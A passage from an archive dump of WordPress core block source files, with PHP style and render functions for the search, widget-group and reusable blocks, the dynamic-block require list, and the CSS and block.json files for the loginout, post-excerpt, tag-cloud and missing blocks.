 * @param string $property       Border property to generate rule for e.g. width or color.
 * @param string $side           Optional side border. The dictates the value retrieved and final CSS property.
 * @param array  $wrapper_styles Current collection of wrapper styles.
 * @param array  $button_styles  Current collection of button styles.
 * @param array  $input_styles   Current collection of input styles.
 */
function apply_block_core_search_border_style( $attributes, $property, $side, &$wrapper_styles, &$button_styles, &$input_styles ) {
	$is_button_inside = isset( $attributes['buttonPosition'] ) && 'button-inside' === $attributes['buttonPosition'];

	$path = array( 'style', 'border', $property );

	if ( $side ) {
		array_splice( $path, 2, 0, $side );
	}

	$value = _wp_array_get( $attributes, $path, false );

	if ( empty( $value ) ) {
		return;
	}

	if ( 'color' === $property && $side ) {
		$has_color_preset = str_contains( $value, 'var:preset|color|' );
		if ( $has_color_preset ) {
			$named_color_value = substr( $value, strrpos( $value, '|' ) + 1 );
			$value             = sprintf( 'var(--wp--preset--color--%s)', $named_color_value );
		}
	}

	$property_suffix = $side ? sprintf( '%s-%s', $side, $property ) : $property;

	if ( $is_button_inside ) {
		$wrapper_styles[] = sprintf( 'border-%s: %s;', $property_suffix, esc_attr( $value ) );
	} else {
		$button_styles[] = sprintf( 'border-%s: %s;', $property_suffix, esc_attr( $value ) );
		$input_styles[]  = sprintf( 'border-%s: %s;', $property_suffix, esc_attr( $value ) );
	}
}

/**
 * This adds CSS rules for a given border property e.g. width or color. It
 * injects rules into the provided wrapper, button and input style arrays for
 * uniform "flat" borders or those with individual sides configured.
 *
 * @since 6.1.0
 *
 * @param array  $attributes     The block attributes.
 * @param string $property       Border property to generate rule for e.g. width or color.
 * @param array  $wrapper_styles Current collection of wrapper styles.
 * @param array  $button_styles  Current collection of button styles.
 * @param array  $input_styles   Current collection of input styles.
 */
function apply_block_core_search_border_styles( $attributes, $property, &$wrapper_styles, &$button_styles, &$input_styles ) {
	apply_block_core_search_border_style( $attributes, $property, null, $wrapper_styles, $button_styles, $input_styles );
	apply_block_core_search_border_style( $attributes, $property, 'top', $wrapper_styles, $button_styles, $input_styles );
	apply_block_core_search_border_style( $attributes, $property, 'right', $wrapper_styles, $button_styles, $input_styles );
	apply_block_core_search_border_style( $attributes, $property, 'bottom', $wrapper_styles, $button_styles, $input_styles );
	apply_block_core_search_border_style( $attributes, $property, 'left', $wrapper_styles, $button_styles, $input_styles );
}

/**
 * Builds an array of inline styles for the search block.
 *
 * The result will contain one entry for shared styles such as those for the
 * inner input or button and a second for the inner wrapper should the block
 * be positioning the button "inside".
 *
 * @since 5.8.0
 *
 * @param  array $attributes The block attributes.
 *
 * @return array Style HTML attribute.
 */
function styles_for_block_core_search( $attributes ) {
	$wrapper_styles   = array();
	$button_styles    = array();
	$input_styles     = array();
	$label_styles     = array();
	$is_button_inside = ! empty( $attributes['buttonPosition'] ) &&
		'button-inside' === $attributes['buttonPosition'];
	$show_label       = ( isset( $attributes['showLabel'] ) ) && false !== $attributes['showLabel'];

	// Add width styles.
	$has_width = ! empty( $attributes['width'] ) && ! empty( $attributes['widthUnit'] );

	if ( $has_width ) {
		$wrapper_styles[] = sprintf(
			'width: %d%s;',
			esc_attr( $attributes['width'] ),
			esc_attr( $attributes['widthUnit'] )
		);
	}

	// Add border width and color styles.
	apply_block_core_search_border_styles( $attributes, 'width', $wrapper_styles, $button_styles, $input_styles );
	apply_block_core_search_border_styles( $attributes, 'color', $wrapper_styles, $button_styles, $input_styles );
	apply_block_core_search_border_styles( $attributes, 'style', $wrapper_styles, $button_styles, $input_styles );

	// Add border radius styles.
	$has_border_radius = ! empty( $attributes['style']['border']['radius'] );

	if ( $has_border_radius ) {
		$default_padding = '4px';
		$border_radius   = $attributes['style']['border']['radius'];

		if ( is_array( $border_radius ) ) {
			// Apply styles for individual corner border radii.
			foreach ( $border_radius as $key => $value ) {
				if ( null !== $value ) {
					// Convert camelCase key to kebab-case.
					$name = strtolower( preg_replace( '/(?<!^)[A-Z]/', '-$0', $key ) );

					// Add shared styles for individual border radii for input & button.
					$border_style    = sprintf(
						'border-%s-radius: %s;',
						esc_attr( $name ),
						esc_attr( $value )
					);
					$input_styles[]  = $border_style;
					$button_styles[] = $border_style;

					// Add adjusted border radius styles for the wrapper element
					// if button is positioned inside.
					if ( $is_button_inside && intval( $value ) !== 0 ) {
						$wrapper_styles[] = sprintf(
							'border-%s-radius: calc(%s + %s);',
							esc_attr( $name ),
							esc_attr( $value ),
							$default_padding
						);
					}
				}
			}
		} else {
			// Numeric check is for backwards compatibility purposes.
			$border_radius   = is_numeric( $border_radius ) ? $border_radius . 'px' : $border_radius;
			$border_style    = sprintf( 'border-radius: %s;', esc_attr( $border_radius ) );
			$input_styles[]  = $border_style;
			$button_styles[] = $border_style;

			if ( $is_button_inside && intval( $border_radius ) !== 0 ) {
				// Adjust wrapper border radii to maintain visual consistency
				// with inner elements when button is positioned inside.
				$wrapper_styles[] = sprintf(
					'border-radius: calc(%s + %s);',
					esc_attr( $border_radius ),
					$default_padding
				);
			}
		}
	}

	// Add color styles.
	$has_text_color = ! empty( $attributes['style']['color']['text'] );
	if ( $has_text_color ) {
		$button_styles[] = sprintf( 'color: %s;', $attributes['style']['color']['text'] );
	}

	$has_background_color = ! empty( $attributes['style']['color']['background'] );
	if ( $has_background_color ) {
		$button_styles[] = sprintf( 'background-color: %s;', $attributes['style']['color']['background'] );
	}

	$has_custom_gradient = ! empty( $attributes['style']['color']['gradient'] );
	if ( $has_custom_gradient ) {
		$button_styles[] = sprintf( 'background: %s;', $attributes['style']['color']['gradient'] );
	}

	// Get typography styles to be shared across inner elements.
	$typography_styles = esc_attr( get_typography_styles_for_block_core_search( $attributes ) );
	if ( ! empty( $typography_styles ) ) {
		$label_styles [] = $typography_styles;
		$button_styles[] = $typography_styles;
		$input_styles [] = $typography_styles;
	}

	// Typography text-decoration is only applied to the label and button.
	if ( ! empty( $attributes['style']['typography']['textDecoration'] ) ) {
		$text_decoration_value = sprintf( 'text-decoration: %s;', esc_attr( $attributes['style']['typography']['textDecoration'] ) );
		$button_styles[]       = $text_decoration_value;
		// Input opts out of text decoration.
		if ( $show_label ) {
			$label_styles[] = $text_decoration_value;
		}
	}

	return array(
		'input'   => ! empty( $input_styles ) ? sprintf( ' style="%s"', esc_attr( safecss_filter_attr( implode( ' ', $input_styles ) ) ) ) : '',
		'button'  => ! empty( $button_styles ) ? sprintf( ' style="%s"', esc_attr( safecss_filter_attr( implode( ' ', $button_styles ) ) ) ) : '',
		'wrapper' => ! empty( $wrapper_styles ) ? sprintf( ' style="%s"', esc_attr( safecss_filter_attr( implode( ' ', $wrapper_styles ) ) ) ) : '',
		'label'   => ! empty( $label_styles ) ? sprintf( ' style="%s"', esc_attr( safecss_filter_attr( implode( ' ', $label_styles ) ) ) ) : '',
	);
}

/**
 * Returns typography classnames depending on whether there are named font sizes/families.
 *
 * @since 6.1.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string The typography color classnames to be applied to the block elements.
 */
function get_typography_classes_for_block_core_search( $attributes ) {
	$typography_classes    = array();
	$has_named_font_family = ! empty( $attributes['fontFamily'] );
	$has_named_font_size   = ! empty( $attributes['fontSize'] );

	if ( $has_named_font_size ) {
		$typography_classes[] = sprintf( 'has-%s-font-size', esc_attr( $attributes['fontSize'] ) );
	}

	if ( $has_named_font_family ) {
		$typography_classes[] = sprintf( 'has-%s-font-family', esc_attr( $attributes['fontFamily'] ) );
	}

	return implode( ' ', $typography_classes );
}

/**
 * Returns typography styles to be included in an HTML style tag.
 * This excludes text-decoration, which is applied only to the label and button elements of the search block.
 *
 * @since 6.1.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string A string of typography CSS declarations.
 */
function get_typography_styles_for_block_core_search( $attributes ) {
	$typography_styles = array();

	// Add typography styles.
	if ( ! empty( $attributes['style']['typography']['fontSize'] ) ) {
		$typography_styles[] = sprintf(
			'font-size: %s;',
			wp_get_typography_font_size_value(
				array(
					'size' => $attributes['style']['typography']['fontSize'],
				)
			)
		);

	}

	if ( ! empty( $attributes['style']['typography']['fontFamily'] ) ) {
		$typography_styles[] = sprintf( 'font-family: %s;', $attributes['style']['typography']['fontFamily'] );
	}

	if ( ! empty( $attributes['style']['typography']['letterSpacing'] ) ) {
		$typography_styles[] = sprintf( 'letter-spacing: %s;', $attributes['style']['typography']['letterSpacing'] );
	}

	if ( ! empty( $attributes['style']['typography']['fontWeight'] ) ) {
		$typography_styles[] = sprintf( 'font-weight: %s;', $attributes['style']['typography']['fontWeight'] );
	}

	if ( ! empty( $attributes['style']['typography']['fontStyle'] ) ) {
		$typography_styles[] = sprintf( 'font-style: %s;', $attributes['style']['typography']['fontStyle'] );
	}

	if ( ! empty( $attributes['style']['typography']['lineHeight'] ) ) {
		$typography_styles[] = sprintf( 'line-height: %s;', $attributes['style']['typography']['lineHeight'] );
	}

	if ( ! empty( $attributes['style']['typography']['textTransform'] ) ) {
		$typography_styles[] = sprintf( 'text-transform: %s;', $attributes['style']['typography']['textTransform'] );
	}

	return implode( '', $typography_styles );
}

/**
 * Returns border color classnames depending on whether there are named or custom border colors.
 *
 * @since 5.9.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string The border color classnames to be applied to the block elements.
 */
function get_border_color_classes_for_block_core_search( $attributes ) {
	$border_color_classes    = array();
	$has_custom_border_color = ! empty( $attributes['style']['border']['color'] );
	$has_named_border_color  = ! empty( $attributes['borderColor'] );

	if ( $has_custom_border_color || $has_named_border_color ) {
		$border_color_classes[] = 'has-border-color';
	}

	if ( $has_named_border_color ) {
		$border_color_classes[] = sprintf( 'has-%s-border-color', esc_attr( $attributes['borderColor'] ) );
	}

	return implode( ' ', $border_color_classes );
}

/**
 * Returns color classnames depending on whether there are named or custom text and background colors.
 *
 * @since 5.9.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string The color classnames to be applied to the block elements.
 */
function get_color_classes_for_block_core_search( $attributes ) {
	$classnames = array();

	// Text color.
	$has_named_text_color  = ! empty( $attributes['textColor'] );
	$has_custom_text_color = ! empty( $attributes['style']['color']['text'] );
	if ( $has_named_text_color ) {
		$classnames[] = sprintf( 'has-text-color has-%s-color', $attributes['textColor'] );
	} elseif ( $has_custom_text_color ) {
		// If a custom 'textColor' was selected instead of a preset, still add the generic `has-text-color` class.
		$classnames[] = 'has-text-color';
	}

	// Background color.
	$has_named_background_color  = ! empty( $attributes['backgroundColor'] );
	$has_custom_background_color = ! empty( $attributes['style']['color']['background'] );
	$has_named_gradient          = ! empty( $attributes['gradient'] );
	$has_custom_gradient         = ! empty( $attributes['style']['color']['gradient'] );
	if (
		$has_named_background_color ||
		$has_custom_background_color ||
		$has_named_gradient ||
		$has_custom_gradient
	) {
		$classnames[] = 'has-background';
	}
	if ( $has_named_background_color ) {
		$classnames[] = sprintf( 'has-%s-background-color', $attributes['backgroundColor'] );
	}
	if ( $has_named_gradient ) {
		$classnames[] = sprintf( 'has-%s-gradient-background', $attributes['gradient'] );
	}

	return implode( ' ', $classnames );
}
loginout/style-rtl.css000064400000000056151330427370011063 0ustar00.wp-block-loginout{
  box-sizing:border-box;
}loginout/style-rtl.min.css000064400000000051151330427370011640 0ustar00.wp-block-loginout{box-sizing:border-box}loginout/style.css000064400000000056151330427370010264 0ustar00.wp-block-loginout{
  box-sizing:border-box;
}loginout/block.json000060400000002002151330427370010364 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/loginout",
	"title": "Login/out",
	"category": "theme",
	"description": "Show login & logout links.",
	"keywords": [ "login", "logout", "form" ],
	"textdomain": "default",
	"attributes": {
		"displayLoginAsForm": {
			"type": "boolean",
			"default": false
		},
		"redirectToCurrent": {
			"type": "boolean",
			"default": true
		}
	},
	"supports": {
		"className": true,
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
loginout/style.min.css000064400000000051151330427370011041 0ustar00.wp-block-loginout{box-sizing:border-box}post-excerpt/editor.min.css000060400000000120151330427370011755 0ustar00.wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{display:inline}post-excerpt/editor.css000060400000000125151330427370011200 0ustar00.wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{
  display:inline;
}post-excerpt/style-rtl.min.css000060400000000475151330427370012443 0ustar00:where(.wp-block-post-excerpt){margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__excerpt{margin-bottom:0;margin-top:0}.wp-block-post-excerpt__more-text{margin-bottom:0;margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__more-link{display:inline-block}post-excerpt/style.css000060400000000540151330427370011053 0ustar00:where(.wp-block-post-excerpt){
  margin-bottom:var(--wp--style--block-gap);
  margin-top:var(--wp--style--block-gap);
}

.wp-block-post-excerpt__excerpt{
  margin-bottom:0;
  margin-top:0;
}

.wp-block-post-excerpt__more-text{
  margin-bottom:0;
  margin-top:var(--wp--style--block-gap);
}

.wp-block-post-excerpt__more-link{
  display:inline-block;
}post-excerpt/style-rtl.css000060400000000540151330427370011652 0ustar00:where(.wp-block-post-excerpt){
  margin-bottom:var(--wp--style--block-gap);
  margin-top:var(--wp--style--block-gap);
}

.wp-block-post-excerpt__excerpt{
  margin-bottom:0;
  margin-top:0;
}

.wp-block-post-excerpt__more-text{
  margin-bottom:0;
  margin-top:var(--wp--style--block-gap);
}

.wp-block-post-excerpt__more-link{
  display:inline-block;
}post-excerpt/editor-rtl.css000060400000000125151330427370011777 0ustar00.wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{
  display:inline;
}post-excerpt/style.min.css000060400000000475151330427370011644 0ustar00:where(.wp-block-post-excerpt){margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__excerpt{margin-bottom:0;margin-top:0}.wp-block-post-excerpt__more-text{margin-bottom:0;margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__more-link{display:inline-block}post-excerpt/block.json000060400000002351151330427370011170 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-excerpt",
	"title": "Excerpt",
	"category": "theme",
	"description": "Display the excerpt.",
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		},
		"moreText": {
			"type": "string"
		},
		"showMoreOnNewLine": {
			"type": "boolean",
			"default": true
		},
		"excerptLength": {
			"type": "number",
			"default": 55
		}
	},
	"usesContext": [ "postId", "postType", "queryId" ],
	"supports": {
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-post-excerpt-editor",
	"style": "wp-block-post-excerpt"
}
post-excerpt/editor-rtl.min.css000060400000000120151330427370012554 0ustar00.wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{display:inline}widget-group.php000060400000004606151330427370007701 0ustar00<?php
/**
 * Server-side rendering of the `core/widget-group` block.
 *
 * @package WordPress
 */

/**
 * Renders the 'core/widget-group' block.
 *
 * @since 5.9.0
 *
 * @global array      $wp_registered_sidebars
 * @global int|string $_sidebar_being_rendered
 *
 * @param array    $attributes The block attributes.
 * @param string   $content The block content.
 * @param WP_Block $block The block.
 *
 * @return string Rendered block.
 */
function render_block_core_widget_group( $attributes, $content, $block ) {
	global $wp_registered_sidebars, $_sidebar_being_rendered;

	if ( isset( $wp_registered_sidebars[ $_sidebar_being_rendered ] ) ) {
		$before_title = $wp_registered_sidebars[ $_sidebar_being_rendered ]['before_title'];
		$after_title  = $wp_registered_sidebars[ $_sidebar_being_rendered ]['after_title'];
	} else {
		$before_title = '<h2 class="widget-title">';
		$after_title  = '</h2>';
	}

	$html = '';

	if ( ! empty( $attributes['title'] ) ) {
		$html .= $before_title . esc_html( $attributes['title'] ) . $after_title;
	}

	$html .= '<div class="wp-widget-group__inner-blocks">';
	foreach ( $block->inner_blocks as $inner_block ) {
		$html .= $inner_block->render();
	}
	$html .= '</div>';

	return $html;
}

/**
 * Registers the 'core/widget-group' block.
 *
 * @since 5.9.0
 */
function register_block_core_widget_group() {
	register_block_type_from_metadata(
		__DIR__ . '/widget-group',
		array(
			'render_callback' => 'render_block_core_widget_group',
		)
	);
}

add_action( 'init', 'register_block_core_widget_group' );

/**
 * Make a note of the sidebar being rendered before WordPress starts rendering
 * it. This lets us get to the current sidebar in
 * render_block_core_widget_group().
 *
 * @since 5.9.0
 *
 * @global int|string $_sidebar_being_rendered
 *
 * @param int|string $index       Index, name, or ID of the dynamic sidebar.
 */
function note_sidebar_being_rendered( $index ) {
	global $_sidebar_being_rendered;
	$_sidebar_being_rendered = $index;
}
add_action( 'dynamic_sidebar_before', 'note_sidebar_being_rendered' );

/**
 * Clear whatever we set in note_sidebar_being_rendered() after WordPress
 * finishes rendering a sidebar.
 *
 * @since 5.9.0
 *
 * @global int|string $_sidebar_being_rendered
 */
function discard_sidebar_being_rendered() {
	global $_sidebar_being_rendered;
	unset( $_sidebar_being_rendered );
}
add_action( 'dynamic_sidebar_after', 'discard_sidebar_being_rendered' );
block.php000060400000006202151330427370006350 0ustar00<?php
/**
 * Server-side rendering of the `core/block` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/block` block on server.
 *
 * @since 5.0.0
 *
 * @global WP_Embed $wp_embed
 *
 * @param array $attributes The block attributes.
 *
 * @return string Rendered HTML of the referenced block.
 */
function render_block_core_block( $attributes ) {
	static $seen_refs = array();

	if ( empty( $attributes['ref'] ) ) {
		return '';
	}

	$reusable_block = get_post( $attributes['ref'] );
	if ( ! $reusable_block || 'wp_block' !== $reusable_block->post_type ) {
		return '';
	}

	if ( isset( $seen_refs[ $attributes['ref'] ] ) ) {
		// WP_DEBUG_DISPLAY must only be honored when WP_DEBUG. This precedent
		// is set in `wp_debug_mode()`.
		$is_debug = WP_DEBUG && WP_DEBUG_DISPLAY;

		return $is_debug ?
			// translators: Visible only in the front end, this warning takes the place of a faulty block.
			__( '[block rendering halted]' ) :
			'';
	}

	if ( 'publish' !== $reusable_block->post_status || ! empty( $reusable_block->post_password ) ) {
		return '';
	}

	$seen_refs[ $attributes['ref'] ] = true;

	// Handle embeds for reusable blocks.
	global $wp_embed;
	$content = $wp_embed->run_shortcode( $reusable_block->post_content );
	$content = $wp_embed->autoembed( $content );

	// Back compat.
	// For blocks that have not been migrated in the editor, add some back compat
	// so that front-end rendering continues to work.

	// This matches the `v2` deprecation. Removes the inner `values` property
	// from every item.
	if ( isset( $attributes['content'] ) ) {
		foreach ( $attributes['content'] as &$content_data ) {
			if ( isset( $content_data['values'] ) ) {
				$is_assoc_array = is_array( $content_data['values'] ) && ! wp_is_numeric_array( $content_data['values'] );

				if ( $is_assoc_array ) {
					$content_data = $content_data['values'];
				}
			}
		}
	}

	// This matches the `v1` deprecation. Rename `overrides` to `content`.
	if ( isset( $attributes['overrides'] ) && ! isset( $attributes['content'] ) ) {
		$attributes['content'] = $attributes['overrides'];
	}

	/**
	 * We set the `pattern/overrides` context through the `render_block_context`
	 * filter so that it is available when a pattern's inner blocks are
	 * rendering via do_blocks given it only receives the inner content.
	 */
	$has_pattern_overrides = isset( $attributes['content'] ) && null !== get_block_bindings_source( 'core/pattern-overrides' );
	if ( $has_pattern_overrides ) {
		$filter_block_context = static function ( $context ) use ( $attributes ) {
			$context['pattern/overrides'] = $attributes['content'];
			return $context;
		};
		add_filter( 'render_block_context', $filter_block_context, 1 );
	}

	$content = do_blocks( $content );
	unset( $seen_refs[ $attributes['ref'] ] );

	if ( $has_pattern_overrides ) {
		remove_filter( 'render_block_context', $filter_block_context, 1 );
	}

	return $content;
}

/**
 * Registers the `core/block` block.
 *
 * @since 5.3.0
 */
function register_block_core_block() {
	register_block_type_from_metadata(
		__DIR__ . '/block',
		array(
			'render_callback' => 'render_block_core_block',
		)
	);
}
add_action( 'init', 'register_block_core_block' );
require-dynamic-blocks.php000060400000010011151330427370011620 0ustar00<?php

// This file was autogenerated by tools/release/sync-stable-blocks.js, do not change manually!
// Requires files for dynamic blocks necessary for core blocks registration.
require_once ABSPATH . WPINC . '/blocks/archives.php';
require_once ABSPATH . WPINC . '/blocks/avatar.php';
require_once ABSPATH . WPINC . '/blocks/block.php';
require_once ABSPATH . WPINC . '/blocks/button.php';
require_once ABSPATH . WPINC . '/blocks/calendar.php';
require_once ABSPATH . WPINC . '/blocks/categories.php';
require_once ABSPATH . WPINC . '/blocks/comment-author-name.php';
require_once ABSPATH . WPINC . '/blocks/comment-content.php';
require_once ABSPATH . WPINC . '/blocks/comment-date.php';
require_once ABSPATH . WPINC . '/blocks/comment-edit-link.php';
require_once ABSPATH . WPINC . '/blocks/comment-reply-link.php';
require_once ABSPATH . WPINC . '/blocks/comment-template.php';
require_once ABSPATH . WPINC . '/blocks/comments.php';
require_once ABSPATH . WPINC . '/blocks/comments-pagination.php';
require_once ABSPATH . WPINC . '/blocks/comments-pagination-next.php';
require_once ABSPATH . WPINC . '/blocks/comments-pagination-numbers.php';
require_once ABSPATH . WPINC . '/blocks/comments-pagination-previous.php';
require_once ABSPATH . WPINC . '/blocks/comments-title.php';
require_once ABSPATH . WPINC . '/blocks/cover.php';
require_once ABSPATH . WPINC . '/blocks/file.php';
require_once ABSPATH . WPINC . '/blocks/footnotes.php';
require_once ABSPATH . WPINC . '/blocks/gallery.php';
require_once ABSPATH . WPINC . '/blocks/heading.php';
require_once ABSPATH . WPINC . '/blocks/home-link.php';
require_once ABSPATH . WPINC . '/blocks/image.php';
require_once ABSPATH . WPINC . '/blocks/latest-comments.php';
require_once ABSPATH . WPINC . '/blocks/latest-posts.php';
require_once ABSPATH . WPINC . '/blocks/list.php';
require_once ABSPATH . WPINC . '/blocks/loginout.php';
require_once ABSPATH . WPINC . '/blocks/media-text.php';
require_once ABSPATH . WPINC . '/blocks/navigation.php';
require_once ABSPATH . WPINC . '/blocks/navigation-link.php';
require_once ABSPATH . WPINC . '/blocks/navigation-submenu.php';
require_once ABSPATH . WPINC . '/blocks/page-list.php';
require_once ABSPATH . WPINC . '/blocks/page-list-item.php';
require_once ABSPATH . WPINC . '/blocks/pattern.php';
require_once ABSPATH . WPINC . '/blocks/post-author.php';
require_once ABSPATH . WPINC . '/blocks/post-author-biography.php';
require_once ABSPATH . WPINC . '/blocks/post-author-name.php';
require_once ABSPATH . WPINC . '/blocks/post-comments-form.php';
require_once ABSPATH . WPINC . '/blocks/post-content.php';
require_once ABSPATH . WPINC . '/blocks/post-date.php';
require_once ABSPATH . WPINC . '/blocks/post-excerpt.php';
require_once ABSPATH . WPINC . '/blocks/post-featured-image.php';
require_once ABSPATH . WPINC . '/blocks/post-navigation-link.php';
require_once ABSPATH . WPINC . '/blocks/post-template.php';
require_once ABSPATH . WPINC . '/blocks/post-terms.php';
require_once ABSPATH . WPINC . '/blocks/post-title.php';
require_once ABSPATH . WPINC . '/blocks/query.php';
require_once ABSPATH . WPINC . '/blocks/query-no-results.php';
require_once ABSPATH . WPINC . '/blocks/query-pagination.php';
require_once ABSPATH . WPINC . '/blocks/query-pagination-next.php';
require_once ABSPATH . WPINC . '/blocks/query-pagination-numbers.php';
require_once ABSPATH . WPINC . '/blocks/query-pagination-previous.php';
require_once ABSPATH . WPINC . '/blocks/query-title.php';
require_once ABSPATH . WPINC . '/blocks/read-more.php';
require_once ABSPATH . WPINC . '/blocks/rss.php';
require_once ABSPATH . WPINC . '/blocks/search.php';
require_once ABSPATH . WPINC . '/blocks/shortcode.php';
require_once ABSPATH . WPINC . '/blocks/site-logo.php';
require_once ABSPATH . WPINC . '/blocks/site-tagline.php';
require_once ABSPATH . WPINC . '/blocks/site-title.php';
require_once ABSPATH . WPINC . '/blocks/social-link.php';
require_once ABSPATH . WPINC . '/blocks/tag-cloud.php';
require_once ABSPATH . WPINC . '/blocks/template-part.php';
require_once ABSPATH . WPINC . '/blocks/term-description.php';
tag-cloud/editor.css000064400000000153151330427370010427 0ustar00.wp-block-tag-cloud .wp-block-tag-cloud{
  border:none;
  border-radius:inherit;
  margin:0;
  padding:0;
}tag-cloud/style-rtl.css000060400000001205151330427370011073 0ustar00.wp-block-tag-cloud{
  box-sizing:border-box;
}
.wp-block-tag-cloud.aligncenter{
  justify-content:center;
  text-align:center;
}
.wp-block-tag-cloud.alignfull{
  padding-left:1em;
  padding-right:1em;
}
.wp-block-tag-cloud a{
  display:inline-block;
  margin-left:5px;
}
.wp-block-tag-cloud span{
  display:inline-block;
  margin-right:5px;
  text-decoration:none;
}

:root :where(.wp-block-tag-cloud.is-style-outline){
  display:flex;
  flex-wrap:wrap;
  gap:1ch;
}

:root :where(.wp-block-tag-cloud.is-style-outline a){
  border:1px solid;
  font-size:unset !important;
  margin-left:0;
  padding:1ch 2ch;
  text-decoration:none !important;
}tag-cloud/editor-rtl.css000064400000000153151330427370011226 0ustar00.wp-block-tag-cloud .wp-block-tag-cloud{
  border:none;
  border-radius:inherit;
  margin:0;
  padding:0;
}tag-cloud/block.json000060400000002246151330427370010415 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/tag-cloud",
	"title": "Tag Cloud",
	"category": "widgets",
	"description": "A cloud of your most used tags.",
	"textdomain": "default",
	"attributes": {
		"numberOfTags": {
			"type": "number",
			"default": 45,
			"minimum": 1,
			"maximum": 100
		},
		"taxonomy": {
			"type": "string",
			"default": "post_tag"
		},
		"showTagCounts": {
			"type": "boolean",
			"default": false
		},
		"smallestFontSize": {
			"type": "string",
			"default": "8pt"
		},
		"largestFontSize": {
			"type": "string",
			"default": "22pt"
		}
	},
	"styles": [
		{ "name": "default", "label": "Default", "isDefault": true },
		{ "name": "outline", "label": "Outline" }
	],
	"supports": {
		"html": false,
		"align": true,
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalLetterSpacing": true
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-tag-cloud-editor"
}
tag-cloud/style-rtl.min.css000060400000001067151330427370011663 0ustar00.wp-block-tag-cloud{box-sizing:border-box}.wp-block-tag-cloud.aligncenter{justify-content:center;text-align:center}.wp-block-tag-cloud.alignfull{padding-left:1em;padding-right:1em}.wp-block-tag-cloud a{display:inline-block;margin-left:5px}.wp-block-tag-cloud span{display:inline-block;margin-right:5px;text-decoration:none}:root :where(.wp-block-tag-cloud.is-style-outline){display:flex;flex-wrap:wrap;gap:1ch}:root :where(.wp-block-tag-cloud.is-style-outline a){border:1px solid;font-size:unset!important;margin-left:0;padding:1ch 2ch;text-decoration:none!important}tag-cloud/editor.min.css000064400000000135151330427370011211 0ustar00.wp-block-tag-cloud .wp-block-tag-cloud{border:none;border-radius:inherit;margin:0;padding:0}tag-cloud/editor-rtl.min.css000064400000000135151330427370012010 0ustar00.wp-block-tag-cloud .wp-block-tag-cloud{border:none;border-radius:inherit;margin:0;padding:0}tag-cloud/style.min.css000060400000001070151330427370011056 0ustar00.wp-block-tag-cloud{box-sizing:border-box}.wp-block-tag-cloud.aligncenter{justify-content:center;text-align:center}.wp-block-tag-cloud.alignfull{padding-left:1em;padding-right:1em}.wp-block-tag-cloud a{display:inline-block;margin-right:5px}.wp-block-tag-cloud span{display:inline-block;margin-left:5px;text-decoration:none}:root :where(.wp-block-tag-cloud.is-style-outline){display:flex;flex-wrap:wrap;gap:1ch}:root :where(.wp-block-tag-cloud.is-style-outline a){border:1px solid;font-size:unset!important;margin-right:0;padding:1ch 2ch;text-decoration:none!important}tag-cloud/style.css000060400000001206151330427370010275 0ustar00.wp-block-tag-cloud{
  box-sizing:border-box;
}
.wp-block-tag-cloud.aligncenter{
  justify-content:center;
  text-align:center;
}
.wp-block-tag-cloud.alignfull{
  padding-left:1em;
  padding-right:1em;
}
.wp-block-tag-cloud a{
  display:inline-block;
  margin-right:5px;
}
.wp-block-tag-cloud span{
  display:inline-block;
  margin-left:5px;
  text-decoration:none;
}

:root :where(.wp-block-tag-cloud.is-style-outline){
  display:flex;
  flex-wrap:wrap;
  gap:1ch;
}

:root :where(.wp-block-tag-cloud.is-style-outline a){
  border:1px solid;
  font-size:unset !important;
  margin-right:0;
  padding:1ch 2ch;
  text-decoration:none !important;
}missing/block.json000060400000001151151330427370010201 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/missing",
	"title": "Unsupported",
	"category": "text",
	"description": "Your site doesn’t include support for this block.",
	"textdomain": "default",
	"attributes": {
		"originalName": {
			"type": "string"
		},
		"originalUndelimitedContent": {
			"type": "string"
		},
		"originalContent": {
			"type": "string",
			"source": "raw"
		}
	},
	"supports": {
		"className": false,
		"customClassName": false,
		"inserter": false,
		"html": false,
		"reusable": false,
		"interactivity": {
			"clientNavigation": true
		}
	}
}
